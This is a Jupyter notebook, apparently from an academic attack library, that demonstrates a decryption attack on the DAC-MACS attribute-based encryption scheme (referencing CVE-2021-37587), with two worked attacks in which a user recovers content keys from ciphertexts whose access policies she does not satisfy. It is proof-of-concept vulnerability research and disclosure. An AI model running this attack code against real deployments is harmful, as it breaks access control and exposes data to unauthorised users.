
# Attacking DAC-MACS

This module contains methods to attack a DAC-MACS implementation
based on https://eprint.iacr.org/2020/460.

It supposes that the user knows x_2 and a complete decryption attack 
can be mounted as described in CVE-2021-37587. It then recovers e(g, g)^{\ alpha_i \cdot s} and decrypts any ciphertext in the system with independence of the policy.

The following scenario is considered:

![title](img/dacmacs_main.png)


## Setup

We import the needed CHARM classes and the attack module, abeattacks.

In [ ]:
from charm.toolbox.pairinggroup import PairingGroup,ZR,G1,GT,pair
from charm.toolbox.secretutil import SecretUtil
from charm.toolbox.ABEncMultiAuth import ABEncMultiAuth
from charm.schemes.abenc.abenc_dacmacs_yj14 import DACMACS

from abeattacks import attack_dac_mac


## System Generation

Alice is a user of the system. She obtains the attribute DOCTOR from the Hospital KGA
and the attribute CONSULTANT from the Insurance company KGA. 

The data owner prepares a ciphertext that Alice cannot decrypt, with access policy
"DOCTOR and GENETICS".

In [ ]:
# Global Authority setup

groupObj = PairingGroup('SS512')
dac = DACMACS(groupObj)
GPP, GMK = dac.setup()

users = {} 
authorities = {}

# Hospital KGA setup

authorityAttributes = ["DOCTOR", "NURSE", "NEUROLOGY", "GENETICS", "Mayo Clinic", "Central Hospital"]
authority1 = "Hospital KGA"

dac.setupAuthority(GPP, authority1, authorityAttributes, authorities)

# Insurance KGA setup

authorityAttributes2 = ["FINANCE", "CONSULTANT", "OPERATIONS", "Downtown", "Market"]
authority2 = "Insurance KGA"

dac.setupAuthority(GPP, authority2, authorityAttributes2, authorities)

# User Alice registration and setup

alice = { 'id': 'alice', 'authoritySecretKeys1': {},  'authoritySecretKeys2': {}, 'keys': None }
alice['keys'], users[alice['id']] = dac.registerUser(GPP)
USK_t_alice = dac.keygen(GPP, authorities[authority1], "DOCTOR", users[alice['id']], alice['authoritySecretKeys1'])
USK_t_alice2 = dac.keygen(GPP, authorities[authority2], "CONSULTANT", users[alice['id']], alice['authoritySecretKeys2'])

# Data owner setup

## Encryption key generation 
k1 = groupObj.random(GT)

## It encrypts the content key with the following policy
## within the system

policy_str = "DOCTOR and GENETICS"
CT1 = dac.encrypt(GPP, policy_str, k1, authorities[authority1])


## Attack 1

Alice decrypts a ciphertext for her, but she does not satisfy the policy e.g. DOCTOR vs (DOCTOR and GENETICS)   

In [ ]:
# We prepare Alice parameters that are needed for the attack

x_1 = alice['keys'][1]
x_2 = users[alice['id']]['u']
p_1 = USK_t_alice['K']
p_2 = CT1['C2'] 

pair_ = attack_dac_mac.dac_mac_compute_pairing(p_1, p_2, x_1)
egg = attack_dac_mac.dac_mac_get_egg(pair_, GPP['g_a'], CT1['C2'], x_1, x_2, USK_t_alice['R'], CT1['C3'])


## Validation

In [ ]:
verify_1 = CT1['C1'] / k1
assert verify_1 == egg, 'FAILED ATTACK' 
print('We can recover egg')

## Decryption attack

In [ ]:
k_recover = CT1['C1']/egg
assert k1 == k_recover, 'FAILED DECRYPTION ATTACK'
print('DECRYPTION ATTACK SUCCESFUL: We can recover the content key k1.')

# Attack 2

Bob is another user of the system, mainly workign with the Insurance KGA. He obtained
the attribute FINANCE. The data owner prepared a ciphertext for bob with the policy
FINANCE or OPERATIONS. Alice will be able to decrypt this ciphertext, even she cannot
fulfill the access policy.

In [ ]:
# Bob user registration

bob = { 'id': 'bob', 'authoritySecretKeys1': {},  'authoritySecretKeys2': {}, 'keys': None }
bob['keys'], users[bob['id']] = dac.registerUser(GPP)
USK_t_bob = dac.keygen(GPP, authorities[authority2], "FINANCE", users[bob['id']], bob['authoritySecretKeys1'])

# Data owner setup for Bob

## generation of the content key and policy
k_bob = groupObj.random(GT)
policy_bob = '(FINANCE or OPERATIONS)'
ct_bob = dac.encrypt(GPP, policy_bob, k_bob, authorities[authority2])

# alice decrypts bob ciphertext even if she does not have the attributes FINANCE or OPERATIONS

p_1 = USK_t_alice2['K'] 
x_1 = alice['keys'][1] 
x_2 = users[alice['id']]['u'] 

p_2 = ct_bob['C2'] 

# attack

pair_ = attack_dac_mac.dac_mac_compute_pairing(p_1, p_2, x_1)
egg = attack_dac_mac.dac_mac_get_egg(pair_, GPP['g_a'], ct_bob['C2'], x_1, x_2, USK_t_alice2['R'], ct_bob['C3'])
k_bob_recover = ct_bob['C1']/egg

## Validation


In [ ]:
assert k_bob == k_bob_recover, 'FAILED ATTACK AGAINST BOB'
print('ATTACK AGAINST BOB SUCCESFUL')